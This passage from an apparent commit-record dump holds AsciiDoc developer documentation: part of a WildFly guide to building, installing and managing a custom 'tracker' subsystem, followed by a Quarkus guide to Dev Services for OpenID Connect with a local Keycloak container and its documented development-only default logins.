in the phases described in\n`org.jboss.as.server.deployment.Phase`.\n\n[[structure]]\n==== STRUCTURE\n\nThe deployment unit processors in this phase determine the structure of\na deployment, and look for sub deployments and metadata files.\n\n[[parse]]\n==== PARSE\n\nIn this phase the deployment unit processors parse the deployment\ndescriptors and build up the annotation index. `Class-Path` entries from\nthe META-INF\/MANIFEST.MF are added.\n\n[[dependencies]]\n==== DEPENDENCIES\n\nExtra class path dependencies are added.
For example, if deploying a\n`war` file, the commonly needed dependencies for a web application are\nadded.\n\n[[configure_module]]\n==== CONFIGURE_MODULE\n\nIn this phase the modular class loader for the deployment is created. No\nattempt should be made to load classes from the deployment until *after*\nthis phase.\n\n[[post_module]]\n==== POST_MODULE\n\nNow that our class loader has been constructed we have access to the\nclasses. In this stage deployment processors may use the\n`Attachments.REFLECTION_INDEX` attachment, which is a deployment index\nused to obtain members of classes in the deployment, and to invoke upon\nthem, bypassing the inefficiencies of using `java.lang.reflect`\ndirectly.\n\n[[install]]\n==== INSTALL\n\nInstall new services coming from the deployment.\n\n[[cleanup]]\n==== CLEANUP\n\nAttachments put in place earlier in the deployment unit processor chain\nmay be removed here.\n\n[[integrate-with-wildfly]]\n== Integrate with WildFly\n\nNow that we have all the code needed for our subsystem, we can build our\nproject by running `mvn install`:\n\n[source,options=\"nowrap\"]\n----\n[kabir ~\/sourcecontrol\/temp\/archetype-test\/acme-subsystem]\n$mvn install\n[INFO] Scanning for projects...\n[...]\nmain:\n [delete] Deleting: \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/null1004283288\n [delete] Deleting directory \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\n [copy] Copying 1 file to \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\/com\/acme\/corp\/tracker\/main\n [copy] Copying 1 file to \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\/com\/acme\/corp\/tracker\/main\n [echo] Module com.acme.corp.tracker has been created in the target\/module directory. Copy to your JBoss AS 7 installation.\n[INFO] Executed tasks\n[INFO]\n[INFO] --- maven-install-plugin:2.3.1:install (default-install) @ acme-subsystem ---\n[INFO] Installing \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/acme-subsystem.jar to \/Users\/kabir\/.m2\/repository\/com\/acme\/corp\/acme-subsystem\/1.0-SNAPSHOT\/acme-subsystem-1.0-SNAPSHOT.jar\n[INFO] Installing \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/pom.xml to \/Users\/kabir\/.m2\/repository\/com\/acme\/corp\/acme-subsystem\/1.0-SNAPSHOT\/acme-subsystem-1.0-SNAPSHOT.pom\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time: 5.851s\n[INFO] Finished at: Mon Jul 11 23:24:58 BST 2011\n[INFO] Final Memory: 7M\/81M\n[INFO] ------------------------------------------------------------------------\n----\n\nThis will have built our project and assembled a module for us that can\nbe used for installing it into WildFly. If you go to the `target\/module`\nfolder where you built the project you will see the module:\n\n[source,options=\"nowrap\"]\n----\n$ls target\/module\/com\/acme\/corp\/tracker\/main\/\nacme-subsystem.jar module.xml\n----\n\nThe `module.xml` comes from `src\/main\/resources\/module\/main\/module.xml`\nand is used to define your module.
It says that it contains the\n`acme-subsystem.jar`:\n\n[source,xml,options=\"nowrap\"]\n----\n<module xmlns=\"urn:jboss:module:1.0\" name=\"com.acme.corp.tracker\">\n <resources>\n <resource-root path=\"acme-subsystem.jar\"\/>\n <\/resources>\n----\n\nAnd has a default set of dependencies needed by every subsystem created.\nIf your subsystem requires additional module dependencies you can add\nthem here before building and installing.\n\n[source,xml,options=\"nowrap\"]\n----\n <dependencies>\n <module name=\"javax.api\"\/>\n <module name=\"org.jboss.staxmapper\"\/>\n <module name=\"org.jboss.as.controller\"\/>\n <module name=\"org.jboss.as.server\"\/>\n <module name=\"org.jboss.modules\"\/>\n <module name=\"org.jboss.msc\"\/>\n <module name=\"org.jboss.logging\"\/>\n <module name=\"org.jboss.vfs\"\/>\n <\/dependencies>\n<\/module>\n----\n\nNote that the name of the module corresponds to the directory structure\ncontaining it. Now copy the `target\/module\/com\/acme\/corp\/tracker\/main\/`\ndirectory and its contents to\n`$WFLY\/modules\/com\/acme\/corp\/tracker\/main\/` (where `$WFLY` is the root\nof your WildFly install).\n\nNext we need to modify `$WFLY\/standalone\/configuration\/standalone.xml`.\nFirst we need to add our new module to the `<extensions>` section:\n\n[source,xml,options=\"nowrap\"]\n----\n <extensions>\n ...\n <extension module=\"org.jboss.as.weld\"\/>\n <extension module=\"com.acme.corp.tracker\"\/>\n <\/extensions>\n----\n\nAnd then we have to add our subsystem to the `<profile>` section:\n\n[source,xml,options=\"nowrap\"]\n----\n <profile>\n ...\n\n <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n <deployment-type suffix=\"war\" tick=\"10000\"\/>\n <\/deployment-types>\n <\/subsystem>\n ...\n <\/profile>\n----\n\nAdding this to a managed domain works exactly the same, except that in\nthis case you need to modify `$WFLY\/domain\/configuration\/domain.xml`.\n\nNow start up WildFly by running `$WFLY\/bin\/standalone.sh` and you should\nsee messages like these after the server has started, which means our\nsubsystem has been added and our `TrackerService` is working:\n\n....\n15:27:33,838 INFO [org.jboss.as] (Controller Boot Thread) JBoss AS 7.0.0.Final \"Lightning\" started in 2861ms - Started 94 of 149 services (55 services are passive or on-demand)\n15:27:42,966 INFO [stdout] (Thread-8) Current deployments deployed while sar tracking active:\n15:27:42,966 INFO [stdout] (Thread-8) []\n15:27:42,967 INFO [stdout] (Thread-8) Cool: 0\n15:27:42,967 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:27:42,967 INFO [stdout] (Thread-9) []\n15:27:42,967 INFO [stdout] (Thread-9) Cool: 0\n15:27:52,967 INFO [stdout] (Thread-8) Current deployments deployed while sar tracking active:\n15:27:52,967 INFO [stdout] (Thread-8) []\n15:27:52,967 INFO [stdout] (Thread-8) Cool: 0\n....\n\nIf you run the command line interface you can execute some commands to\nsee more about the subsystem.
For example\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource-description(recursive=true, operations=true)\n----\n\nwill return a lot of information, including what we provided in the\n`DescriptionProvider`s we created to document our subsystem.\n\nTo see the current subsystem state you can execute\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\n \"war\" => {\"tick\" => 10000L},\n \"sar\" => {\"tick\" => 10000L}\n }}\n}\n----\n\nWe can remove both of the deployment types, which removes them from the\nmodel:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=sar:remove\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:remove\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => undefined}\n}\n----\n\nYou should now see that the output from the `TrackerService` instances has\nstopped.\n\nNow, let's add the war tracker again:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:add\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\"war\" => {\"tick\" => 10000L}}}\n}\n----\n\nand the WildFly console should show the messages coming from the war\n`TrackerService` again.\n\nNow let us deploy something. You can find two maven projects for test\nwars already built at link:downloads\/test1.zip[test1.zip] and\nlink:downloads\/test2.zip[test2.zip]. If you download them and\nextract them to `\/Downloads\/test1` and `\/Downloads\/test2`, you can see\nthat `\/Downloads\/test1\/target\/test1.war` contains a `META-INF\/cool.txt`\nwhile `\/Downloads\/test2\/target\/test2.war` does not contain that file.\nFrom the CLI deploy `test1.war` first:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] deploy ~\/Downloads\/test1\/target\/test1.war\n'test1.war' deployed successfully.\n----\n\nAnd you should now see the output from the war `TrackerService` list the\ndeployments:\n\n....\n15:35:03,712 INFO [org.jboss.as.server.deployment] (MSC service thread 1-2) Starting deployment of \"test1.war\"\n15:35:03,988 INFO [org.jboss.web] (MSC service thread 1-1) registering web context: \/test1\n15:35:03,996 INFO [org.jboss.as.server.controller] (pool-2-thread-9) Deployed \"test1.war\"\n15:35:13,056 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:35:13,056 INFO [stdout] (Thread-9) [test1.war]\n15:35:13,057 INFO [stdout] (Thread-9) Cool: 1\n....\n\nSo our `test1.war` got picked up as a 'cool' deployment.
Now if we\ndeploy `test2.war`:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] deploy ~\/sourcecontrol\/temp\/archetype-test\/test2\/target\/test2.war\n'test2.war' deployed successfully.\n----\n\nYou will see that deployment get picked up as well, but since there is no\n`META-INF\/cool.txt` it is not marked as a 'cool' deployment:\n\n....\n15:37:05,634 INFO [org.jboss.as.server.deployment] (MSC service thread 1-4) Starting deployment of \"test2.war\"\n15:37:05,699 INFO [org.jboss.web] (MSC service thread 1-1) registering web context: \/test2\n15:37:05,982 INFO [org.jboss.as.server.controller] (pool-2-thread-15) Deployed \"test2.war\"\n15:37:13,075 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:37:13,075 INFO [stdout] (Thread-9) [test1.war, test2.war]\n15:37:13,076 INFO [stdout] (Thread-9) Cool: 1\n....\n\nAn undeploy:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] undeploy test1.war\nSuccessfully undeployed test1.war.\n----\n\nis also reflected in the `TrackerService` output:\n\n....\n15:38:47,901 INFO [org.jboss.as.server.controller] (pool-2-thread-21) Undeployed \"test1.war\"\n15:38:47,934 INFO [org.jboss.as.server.deployment] (MSC service thread 1-3) Stopped deployment test1.war in 40ms\n15:38:53,091 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:38:53,092 INFO [stdout] (Thread-9) [test2.war]\n15:38:53,092 INFO [stdout] (Thread-9) Cool: 0\n....\n\nFinally, we registered a write attribute handler for the `tick` property\nof the `type`, so we can change the frequency:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:write-attribute(name=tick,value=1000)\n{\"outcome\" => \"success\"}\n----\n\nYou should now see the output from the `TrackerService` happen every\nsecond:\n\n....\n15:39:43,100 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:43,100 INFO [stdout] (Thread-9) [test2.war]\n15:39:43,101 INFO [stdout] (Thread-9) Cool: 0\n15:39:44,101 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:44,102 INFO [stdout] (Thread-9) [test2.war]\n15:39:44,105 INFO [stdout] (Thread-9) Cool: 0\n15:39:45,106 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:45,106 INFO [stdout] (Thread-9) [test2.war]\n....\n\nIf you open `$WFLY\/standalone\/configuration\/standalone.xml` you can see\nthat our subsystem entry reflects the current state of the subsystem:\n\n[source,xml,options=\"nowrap\"]\n----\n <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"war\" tick=\"1000\"\/>\n <\/deployment-types>\n <\/subsystem>\n----\n\n[[expressions]]\n== Expressions\n\nExpressions are a mechanism that enables you to support variables in your\nattributes, for instance when you want the value of an attribute to be\nresolved using system or environment properties.\n\nAn example expression is\n\n....\n${jboss.bind.address.management:127.0.0.1}\n....\n\nwhich means that the value should be taken from a system property named\n`jboss.bind.address.management`, and if it is not defined, `127.0.0.1`\nshould be used.\n\n[[what-expression-types-are-supported]]\n=== What expression types are supported\n\n* System properties, which are resolved using\n`java.lang.System.getProperty(String key)`\n* Environment properties, which are resolved using\n`java.lang.System.getenv(String name)`.\n* Security vault expressions, resolved against the security vault\nconfigured for the server or Host Controller that needs to resolve the\nexpression.
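\nFor example, provided the attribute definition allows expressions (as\ndescribed in the next section), the tracker subsystem's `tick` attribute\ncould be configured like this, where `tracker.tick` is a purely\nillustrative system property name:\n\n[source,xml,options=\"nowrap\"]\n----\n<deployment-type suffix=\"war\" tick=\"${tracker.tick:10000}\"\/>\n----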
\nIn all cases, the syntax for the expression is\n\n....\n${expression_to_resolve}\n....\n\nFor an expression meant to be resolved against environment properties,\nthe `expression_to_resolve` must be prefixed with `env.`. The portion\nafter `env.` will be the name passed to\n`java.lang.System.getenv(String name)`.\n\nSecurity vault expressions do not support default values (i.e. the\n`127.0.0.1` in the `jboss.bind.address.management:127.0.0.1` example\nabove).\n\n[[how-to-support-expressions-in-subsystems]]\n=== How to support expressions in subsystems\n\nThe easiest way is to use `AttributeDefinition`, which provides support\nfor expressions simply by being used correctly.\n\nWhen we create an `AttributeDefinition`, all we need to do is mark that it\nallows expressions. Here is an example of how to define an attribute that\nallows expressions to be used:\n\n[source,java,options=\"nowrap\"]\n----\nSimpleAttributeDefinition MY_ATTRIBUTE =\n new SimpleAttributeDefinitionBuilder(\"my-attribute\", ModelType.INT, true)\n .setAllowExpression(true)\n .setFlags(AttributeAccess.Flag.RESTART_ALL_SERVICES)\n .setDefaultValue(new ModelNode(1))\n .build();\n----\n\nThen later, when you are parsing the xml configuration, you should use the\nMY_ATTRIBUTE attribute definition to set the value on the management\noperation ModelNode you are creating:\n\n[source,java,options=\"nowrap\"]\n----\n....\n String attr = reader.getAttributeLocalName(i);\n String value = reader.getAttributeValue(i);\n if (attr.equals(\"my-attribute\")) {\n MY_ATTRIBUTE.parseAndSetParameter(value, operation, reader);\n } else if (attr.equals(\"suffix\")) {\n.....\n----\n\nNote that this just helps you to properly set the value on the model\nnode you are working on, so there is no need to set anything else on the\nmodel for this attribute. The `parseAndSetParameter` method parses the\nvalue that was read from xml for possible expressions in it and, if it\nfinds any, creates a special model node of type\n`ModelType.EXPRESSION`.\n\nLater, in your operation handlers where you implement `populateModel` and\nhave to store the value from the operation into the configuration model,\nyou also use this MY_ATTRIBUTE attribute definition.\n\n[source,java,options=\"nowrap\"]\n----\n @Override\n protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n MY_ATTRIBUTE.validateAndSet(operation,model);\n }\n----\n\nThis will make sure that the attribute that is stored from the operation\nto the model is valid and nothing is lost.
It also checks the value\nstored in the operation `ModelNode`, and if it isn't already\n`ModelType.EXPRESSION`, it checks if the value is a string that contains\nthe expression syntax. If so, the value stored in the model will be of\ntype `ModelType.EXPRESSION`. Doing this ensures that expressions are\nproperly handled when they appear in operations that weren't created by\nthe subsystem parser, but are instead passed in from CLI or admin\nconsole users.\n\nAs the last step we need to use the value of the attribute. This is usually\ndone inside the `performRuntime` method:\n\n[source,java,options=\"nowrap\"]\n----\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model, ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers) throws OperationFailedException {\n ....\n final int attributeValue = MY_ATTRIBUTE.resolveModelAttribute(context, model).asInt();\n ...\n\n }\n----\n\nAs you can see, the attribute's value is not resolved until it is\nneeded for use in the subsystem's runtime services. The resolved value\nis not stored in the configuration model; the unresolved expression is.\nThat way we do not lose any information in the model and can ensure that\nmarshalling is also done properly, since we must marshal back the\nunresolved value.\n\n`AttributeDefinition` also helps you with that:\n\n[source,java,options=\"nowrap\"]\n----\n public void writeContent(XMLExtendedStreamWriter writer, SubsystemMarshallingContext context) throws XMLStreamException {\n ....\n MY_ATTRIBUTE.marshallAsAttribute(sessionData, writer);\n MY_OTHER_ATTRIBUTE.marshallAsElement(sessionData, false, writer);\n ...\n}\n----\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"817d5f86cd60c147cd6dea870f6897e080da0d6a","subject":"Fix various issues in newly added security-openid-connect-dev-services.adoc","message":"Fix various issues in newly added security-openid-connect-dev-services.adoc\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/security-openid-connect-dev-services.adoc","new_file":"docs\/src\/main\/asciidoc\/security-openid-connect-dev-services.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Dev Services for OpenId Connect\n\ninclude::.\/attributes.adoc[]\n\nThis guide covers the Dev Services for OpenId Connect Keycloak provider and explains how to support other OpenId Connect providers.\n\n== Introduction\n\nQuarkus introduces an experimental `Dev Services For Keycloak` feature which is enabled by default when the `quarkus-oidc` extension is started in dev mode. It starts a Keycloak container and initializes it by registering the existing Keycloak realm or creating a new realm with the client and users for you to start developing your Quarkus application secured by Keycloak immediately.
It will restart a container when the `application.properties` or the realm file changes have been detected.\n\nAdditionally, link:dev-ui[Dev UI] available at http:\/\/localhost:8080\/q\/dev[\/q\/dev] supports this feature with a Keycloak specific page which helps to acquire the tokens from Keycloak and test your Quarkus application.\n\n== Dev Services for Keycloak\n\nStart your application without configuring `quarkus.oidc` properties in `application.properties`. You will see in the console something similar to:\n\n[source,shell]\n----\n$ mvn quarkus:dev\n\n2021-06-04 16:22:47,175 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Creating container for image: quay.io\/keycloak\/keycloak:14.0.0\n2021-06-04 16:22:47,243 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Starting container with ID: 6469f6db9cec2c855fcc6c8db4273944cc9d69e8f6803a0b47eb2d5b8f5b94fd\n2021-06-04 16:22:47,629 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Container quay.io\/keycloak\/keycloak:14.0.0 is starting: 6469f6db9cec2c855fcc6c8db4273944cc9d69e8f6803a0b47eb2d5b8f5b94fd\n2021-06-04 16:22:47,643 INFO [org.tes.con.wai.str.HttpWaitStrategy] (build-38) \/elastic_lovelace: Waiting for 60 seconds for URL: http:\/\/localhost:32812\/auth (where port 32812 maps to container port 8080)\n2021-06-04 16:23:07,665 INFO [\ud83d\udc33 .io\/keycloak\/keycloak:14.0.0]] (build-38) Container quay.io\/keycloak\/keycloak:14.0.0 started in PT5.500489S\n...\n2021-06-04 16:23:11,155 INFO [io.quarkus] (Quarkus Main Thread) security-openid-connect-quickstart 1.0.0-SNAPSHOT on JVM (powered by Quarkus 999-SNAPSHOT) started in 25.968s. Listening on: http:\/\/localhost:8080\n2021-06-04 16:23:11,157 INFO [io.quarkus] (Quarkus Main Thread) Profile dev activated. Live Coding activated.\n----\n\nThe `quay.io\/keycloak\/keycloak:14.0.0` Keycloak image is used by default to start a container. 
`quarkus.keycloak.devservices.image-name` can be used to change the Keycloak image used.\n\nNow open the main Dev UI page and you will see the `OpenId Connect Card` linking to a `Keycloak` page:\n\nimage::dev-ui-oidc-keycloak-card.png[alt=Dev UI OpenId Connect Card,role=\"center\"]\n\nClick on the `Provider: Keycloak` link and you will see a Keycloak page which will be presented slightly differently depending on how the `Dev Services for Keycloak` feature has been configured.\n\n=== Testing Service Applications\n\nBy default the Keycloak page can be used to support the development of a link:security-openid-connect[Quarkus OIDC service application].\n\n==== Implicit Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=implicit` in `application.properties` (this is the default value) then an `implicit` grant will be used to acquire both access and ID tokens.\nUsing this grant is recommended to emulate a typical flow where a `Single Page Application` acquires the tokens and uses them to access Quarkus services.\n\nFirst you will see an option to `Log into Single Page Application`:\n\nimage::dev-ui-keycloak-sign-in-to-spa.png[alt=Dev UI OpenId Connect Keycloak Page - Log into Single Page Application,role=\"center\"]\n\nNext, after you select this option, you will be redirected to Keycloak to authenticate, for example, as `alice:alice`, and then returned to the page representing the SPA:\n\nimage::dev-ui-keycloak-test-service-from-spa.png[alt=Dev UI OpenId Connect Keycloak Single Page Application,role=\"center\"]\n\nHere you can test the service with either the access token or ID token (note that the ID token will be sent as a regular bearer token).\n\nFinally you can click a `Logged in` option if you'd like to log out and authenticate to Keycloak as a different user.\n\n==== Password Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=password` in `application.properties` then you will see a screen like this one:\n\nimage::dev-ui-keycloak-password-grant.png[alt=Dev UI OpenId Connect Keycloak Page - Password Grant,role=\"center\"]\n\nEnter a registered user name, a relative service endpoint path, click on `Test Service` and you will see a status code such as `200`, `403`, `401` or `404` printed.\n\nYou will also see in the Dev UI console something similar to:\n\n[source,shell]\n----\n2021-07-19 17:58:11,407 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Getting token from 'http:\/\/localhost:32818\/auth\/realms\/quarkus\/protocol\/openid-connect\/token' for user 'alice' in realm 'quarkus' using client id 'quarkus-app'\n2021-07-19 17:58:11,533 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Test token: eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJ6Z2tDazJQZ1JaYnVlVG5kcTFKSW1sVnNoZ2hhbWhtbnBNcXU0QUt5MnJBIn0.ey...\n2021-07-19 17:58:11,536 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Sending token to 'http:\/\/localhost:8080\/api\/admin'\n2021-07-19 17:58:11,674 INFO [io.qua.oid.dep.dev.key.KeycloakDevConsolePostHandler] (security-openid-connect-quickstart-dev.jar) (DEV Console action) Result: 200\n----\n\nA token is acquired from Keycloak using a `password` grant and is sent to the service endpoint.\n\n==== Client Credentials Grant\n\nIf you set `quarkus.keycloak.devservices.grant.type=client` then a `client_credentials` grant will be used to acquire a
token, with the page showing no `User` field in this case:\n\nimage::dev-ui-keycloak-client-credentials-grant.png[alt=Dev UI OpenId Connect Keycloak Page - Client Credentials Grant,role=\"center\"]\n\nYou can test the service the same way as with the `Password` grant.\n\n=== Developing OpenId Connect Web App Applications\n\nIf you develop a link:security-openid-connect-web-authentication[Quarkus OIDC web-app application] then you should set `quarkus.oidc.application-type=web-app` in `application.properties` before starting the application.\n\nYou will see a screen like this one:\n\nimage::dev-ui-keycloak-sign-in-to-service.png[alt=Dev UI OpenId Connect Keycloak Sign In,role=\"center\"]\n\nSet a relative service endpoint path, click on `Sign In To Service` and you will be redirected to Keycloak to enter a username and password in a new browser tab and get a response from the Quarkus application.\n\n=== Keycloak Initialization\n\nYou do not need to configure `quarkus-oidc` to start developing your Quarkus Keycloak `OIDC` applications, with the only exception being that `quarkus.oidc.application-type=web-app` has to be set in `application.properties` to give the `Keycloak` page a hint that it needs to show an option to `Sign In To Service`.\n\nBy default, the `quarkus` realm, a `quarkus-app` client with a `secret` password, `alice` and `bob` users (with the passwords matching the names), and `user` and `admin` roles are created, with `alice` given both `admin` and `user` roles and `bob` only the `user` role.\n\nUsernames, secrets and their roles can be customized with `quarkus.keycloak.devservices.users` (the map which contains usernames and secrets) and `quarkus.keycloak.devservices.roles` (the map which contains usernames and comma separated role values); a configuration sketch is shown at the end of this section.\n\n`quarkus.oidc.client-id` and `quarkus.oidc.credentials.secret` can be used to customize the client id and secret.\n\nHowever it is likely your Keycloak configuration may be more complex and require setting more properties.\n\nThis is why `quarkus.keycloak.devservices.realm-path` is always checked first before trying to initialize Keycloak with the default or configured realm, client, user and roles properties. If the realm file exists on the file system or classpath then only this realm will be used to initialize Keycloak.\n\nAlso the Keycloak page offers an option to `Sign In To Keycloak To Configure Realms` using a `Keycloak Admin` option in the top right corner:\n\nimage::dev-ui-keycloak-admin.png[alt=Dev UI OpenId Connect Keycloak Page - Keycloak Admin,role=\"center\"]\n\nSign in to Keycloak as `admin:admin` in order to further customize the realm properties or create a new realm, export the realm and have Keycloak initialized with the custom realm after a restart.\n\nNote that even if you initialize Keycloak from a realm file, you still need to set the `quarkus.keycloak.devservices.realm-name` property for `quarkus.oidc.auth-server-url` to be calculated correctly.
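\nPutting this together, a minimal `application.properties` customization might look like this (map-style keys as shown are how such map properties are typically set; the user name, password, roles and realm name below are illustrative):\n\n[source,properties]\n----\nquarkus.keycloak.devservices.realm-name=quarkus\nquarkus.keycloak.devservices.users.duke=dukePassword\nquarkus.keycloak.devservices.roles.duke=admin,user\n----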
Setting the `quarkus.keycloak.devservices.users` property is needed if a `password` grant is used to acquire the tokens to test the OIDC `service` applications.\n\n== Disable DevServices for Keycloak\n\n`DevServices For Keycloak` will not be activated if either `quarkus.oidc.auth-server-url` is already initialized or the default OIDC tenant is disabled with `quarkus.oidc.tenant.enabled=false`, irrespective of whether you work with Keycloak or not.\n\nIf you prefer not to have a `DevServices for Keycloak` container started, or do not work with Keycloak, then you can also disable this feature with `quarkus.keycloak.devservices.enabled=false`; this is only necessary if you expect to start `quarkus:dev` without `quarkus.oidc.auth-server-url`.\n\nThe main Dev UI page will include an empty `OpenId Connect Card` when `DevServices for Keycloak` is disabled:\n\nimage::dev-ui-oidc-card.png[alt=Dev UI OpenId Connect Card,role=\"center\"]\n\n== Dev Services Support for other OpenId Connect Providers\n\nYour custom extension only needs to extend `quarkus-oidc` and add the dependencies required to support your provider to the extension's `deployment` module.\n\nThe build step dealing with the `DevServices` should additionally register two runtime properties into the \"io.quarkus.quarkus-oidc\" namespace: `oidcProviderName` (for example, `Google`) and `oidcProviderUrlBase` (for example: `mycompany.devservices-google`) for the `OpenId Connect Card` to link to the Dev UI page representing your provider, for example:\n\n[source,java]\n----\npackage io.quarkus.oidc.okta.runtime;\n\nimport java.util.function.Supplier;\n\nimport io.quarkus.runtime.annotations.Recorder;\n\n\/\/ This simple recorder is the only code which will be located in the extension's `runtime` module\n@Recorder\npublic class OktaDevServicesRecorder {\n\n public Supplier<String> getProviderName() {\n return new Supplier<String>() {\n\n @Override\n public String get() {\n return \"OKTA\";\n }\n };\n }\n\n public Supplier<String> getProviderUrlBase() {\n return new Supplier<String>() {\n\n @Override\n public String get() {\n return \"io.quarkus\" + \".\" + \"quarkus-oidc-okta\";\n }\n };\n }\n}\n\n\npackage io.quarkus.oidc.okta.deployment.devservices;\n\nimport static io.quarkus.deployment.annotations.ExecutionTime.RUNTIME_INIT;\n\nimport java.util.Optional;\n\nimport io.quarkus.deployment.IsDevelopment;\nimport io.quarkus.deployment.annotations.BuildProducer;\nimport io.quarkus.deployment.annotations.BuildStep;\nimport io.quarkus.deployment.annotations.Consume;\nimport io.quarkus.deployment.annotations.Record;\nimport io.quarkus.deployment.builditem.RuntimeConfigSetupCompleteBuildItem;\nimport io.quarkus.devconsole.spi.DevConsoleRouteBuildItem;\nimport io.quarkus.devconsole.spi.DevConsoleRuntimeTemplateInfoBuildItem;\n\npublic class OktaDevConsoleProcessor {\n\n @BuildStep(onlyIf = IsDevelopment.class)\n @Record(value = RUNTIME_INIT)\n public void setOidcProviderProperties(BuildProducer<DevConsoleRuntimeTemplateInfoBuildItem> provider,\n OktaDevServicesRecorder recorder,\n Optional<DevServicesConfigBuildItem> configProps) {\n if (configProps.isPresent()) {\n provider.produce(new DevConsoleRuntimeTemplateInfoBuildItem(\"io.quarkus\", \"quarkus-oidc\", \"oidcProviderName\",\n recorder.getProviderName()));\n provider.produce(new DevConsoleRuntimeTemplateInfoBuildItem(\"io.quarkus\", \"quarkus-oidc\", \"oidcProviderUrlBase\",\n recorder.getProviderUrlBase()));\n }\n }\n}\n\n----\n\nAdditionally, the extension should produce a 
`io.quarkus.oidc.deployment.devservices.OidcProviderBuildItem` to disable the default `DevServices for Keycloak`, instead of the users having to type `quarkus.keycloak.devservices.enabled=false`.\n\nPlease follow the link:dev-ui[Dev UI] tutorial as well as check the `extensions\/oidc\/deployment` sources for more ideas.\n\n== References\n\n* link:dev-ui[Dev UI]\n* https:\/\/www.keycloak.org\/documentation.html[Keycloak Documentation]\n* https:\/\/openid.net\/connect\/[OpenID Connect]\n* link:security-openid-connect[Quarkus - Using OpenID Connect to Protect Service Applications using Bearer Token Authorization]\n* link:security-openid-connect-web-authentication[Quarkus - Using OpenID Connect to Protect Web Applications using Authorization Code Flow]\n* link:security[Quarkus Security]\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Dev Services for OpenId Connecta\n\ninclude::.\/attributes.adoc[]\n\nThis guide covers the Dev Services for OpenId Connect Keycloak provider and explains how to support other OpenId Connect providers.\n\n== Introduction\n\nQuarkus introduces an experimental `DevServices For Keycloak` feature which is enabled by default when the `quarkus-oidc` extension is loaded in a dev mode with `mvn quarkus:dev`. It starts a Keycloak container and initializes it by registering the existing Keycloak realm or creating a new realm with the client and users for you to start developing your Quarkus application secured by Keycloak immediately. It will restart a container when the `application.properties` or the realm file changes have been detected.\n\nAdditionally, link:dev-ui[Dev UI] available at http:\/\/localhost:8080\/q\/dev[\/q\/dev] supports this feature with a Keycloak specific page which helps to acquire the tokens from Keycloak and test your Quarkus application.\n\n== DevServices for Keycloak\n\nStart your application without configuring `quarkus.oidc` properties in `application.properties`. You will see in the console something similar to:\n\n[source,shell]\n----\n$ mvn 